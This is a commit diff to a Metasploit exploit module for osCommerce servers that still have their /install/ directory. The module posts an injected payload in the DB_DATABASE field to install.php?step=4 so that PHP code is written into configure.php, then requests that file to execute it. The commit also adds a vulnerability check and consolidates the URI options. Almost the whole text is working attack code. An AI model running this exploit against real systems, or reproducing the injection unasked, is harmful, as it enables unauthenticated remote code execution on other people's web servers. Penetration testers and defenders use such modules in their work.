Update osCommerce.rb

2018-04-06 10:40:28 +01:00 · 2018-04-06 10:40:28 +01:00 · 0d254b4e5c
parent b5681cb954
commit 0d254b4e5c
1 changed files with 25 additions and 14 deletions
--- a/modules/exploits/multi/http/osCommerce.rb
+++ b/modules/exploits/multi/http/osCommerce.rb
@ -4,13 +4,13 @@
 ##

 class MetasploitModule < Msf::Exploit::Remote
-  Rank = GoodRanking
+  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'osCommerce 2.3.4.1 - Remote Code Execution',
+      'Name'           => 'osCommerce Installer Unauthenticated Code Execution',
      'Description'    => %q{
         If the /install/ directory was not removed, it is possible for an unauthenticated
         attacker to run the "install_4.php" script, which will create the configuration
@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'License'        => MSF_LICENSE,
      'References'     =>
        [
-          [ 'EDB', '44374'],
+          ['EDB', '44374'],
        ],
        'Payload'      =>
        {
@ -41,28 +41,39 @@ class MetasploitModule < Msf::Exploit::Remote
      'DefaultTarget' => 0))
     register_options(
    [
-      OptString.new('INSTALLURL', [true, 'The path to the install file', '/catalog/install/install.php?step=4']),
-      OptString.new('TARGETURI', [true, 'The path to the configure.php file', '/catalog/install/includes/configure.php'])
-    ], self.class)
+      OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'     => normalize_uri(datastore['URI'], 'install.php'),
+      'method' => 'GET'
+    })
+
+    if res and res.code == 200
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
  end

  def trigger
-    res = send_request_cgi({
-      'uri'     => normalize_uri(datastore['TARGETURI']),
-      'method'  => 'GET',
+    send_request_cgi({
+      'uri'     => normalize_uri(datastore['URI'], 'includes/configure.php'),
+      'method'  => 'GET'
    })
  end

  def exploit
-    uri = target_uri.path
    data = "DIR_FS_DOCUMENT_ROOT=./&DB_DATABASE=');"
    data << payload.encoded
    data << "/*"

    res = send_request_cgi({
-      'uri'     => normalize_uri(datastore['INSTALLURL']),
+      'uri'     => normalize_uri(datastore['URI'], 'install.php?step=4'),
      'method'  => 'POST',
-      'data'    => data,
+      'data'    => data
     })
  trigger
  end